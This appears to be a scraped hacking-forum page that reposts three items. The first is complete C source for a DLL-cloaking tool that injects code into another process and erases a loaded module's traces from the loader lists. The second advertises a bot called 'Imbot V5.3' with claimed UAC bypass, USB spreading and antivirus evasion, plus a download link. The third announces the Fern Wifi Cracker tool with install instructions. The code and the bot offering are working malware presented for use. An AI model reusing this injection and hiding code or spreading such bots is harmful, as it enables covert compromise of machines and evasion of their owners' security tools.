bool CloakDll_stub(HMODULE); void CD_stubend(); bool CloakDll(char *, char *); unsigned long GetProcessIdFromProcname(char *); HMODULE GetRemoteModuleHandle(unsigned long, char *); int main(int argc, char **argv) { CloakDll("notepad.exe", "kernel32.dll"); return 0; } bool CloakDll(char *process, char *dllName) { PathStripPath(dllName); unsigned long procId; procId = GetProcessIdFromProcname(process); HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procId); // Calculate the length of the stub by subtracting it's address // from the beginning of the function directly ahead of it. // // NOTE: If the compiler compiles the functions in a different // order than they appear in the code, this will not work as // it's supposed to. However, most compilers won't do that. unsigned int stubLen = (unsigned long)CD_stubend - (unsigned long)CloakDll_stub; // Allocate space for the CloakDll_stub function void *stubAddress = VirtualAllocEx(hProcess, NULL, stubLen, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); // Write the stub's code to the page we allocated for it WriteProcessMemory(hProcess, stubAddress, CloakDll_stub, stubLen, NULL); HMODULE hMod = GetRemoteModuleHandle(procId, dllName); // Create a thread in the remote process to execute our code CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)stubAddress, hMod, 0, NULL); // Clean up after ourselves, so as to leave as little impact as possible // on the remote process VirtualFreeEx(hProcess, stubAddress, stubLen, MEM_RELEASE); return true; } bool CloakDll_stub(HMODULE hMod) { ProcessModuleInfo *pmInfo; ModuleInfoNode *module; _asm { mov eax, fs:[18h] // TEB mov eax, [eax + 30h] // PEB mov eax, [eax + 0Ch] // PROCESS_MODULE_INFO mov pmInfo, eax } module = (ModuleInfoNode *)(pmInfo->LoadOrder.Flink); while(module->baseAddress && module->baseAddress != hMod) module = (ModuleInfoNode *)(module->LoadOrder.Flink); if(!module->baseAddress) return false; // Remove the module entry from the list here /////////////////////////////////////////////////// // Unlink from the load order list UNLINK(module->LoadOrder); // Unlink from the init order list UNLINK(module->InitOrder); // Unlink from the memory order list UNLINK(module->MemoryOrder); // Unlink from the hash table UNLINK(module->HashTable); // Erase all traces that it was ever there /////////////////////////////////////////////////// // This code will pretty much always be optimized into a rep stosb/stosd pair // so it shouldn't cause problems for relocation. // Zero out the module name memset(module->fullPath.Buffer, 0, module->fullPath.Length); // Zero out the memory of this module's node memset(module, 0, sizeof(ModuleInfoNode)); return true; } __declspec(naked) void CD_stubend() { } unsigned long GetProcessIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot; BOOL retval, ProcFound = false; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } return pe.th32ProcessID; } HMODULE GetRemoteModuleHandle(unsigned long pId, char *module) { MODULEENTRY32 modEntry; HANDLE tlh = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pId); modEntry.dwSize = sizeof(MODULEENTRY32); Module32First(tlh, &modEntry); do { if(!stricmp(modEntry.szModule, module)) return modEntry.hModule; modEntry.dwSize = sizeof(MODULEENTRY32); } while(Module32Next(tlh, &modEntry)); return NULL; } Sursa: ic0de.org

Imbot V5.3 + Support for all Windows systems (Including Seven and startup for Windows Vista) + Bypass UAC of Windows Vista and Windows seven (do not simply pass off without being seen) + Command to open in a web browser of choice (syntax. <web> Navigate) USB + Spread FUD (Undetectable) * Improved organizational system nicks and identification. Download: http://www.opensc.ws/attachments/bots-rootkits/4896d1290833381-imbot-v5-3-imbot-v5.3.rar Sursa: Imbot V5.3

Wifi Cracker 1.5 - Linux Fern Wifi Cracker 1.5 is available, download fern 1.2 then update to 1.5 by using the update download button This is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools. It should work on any version of linux running the following: Requirements: python python-qt4 macchanger aircrack-ng xterm subversion To install simply run the following command in terminal after changing directory to the path were the downloaded package is: root@host:~# dpkg -i Fern-Wifi-Cracker_1.2_all.deb Download: http://code.google.com/p/fern-wifi-cracker/downloads/list Sursa: http://www.hackhound.org/forum/index.php?/topic/39379-wifi-cracker-15-linux/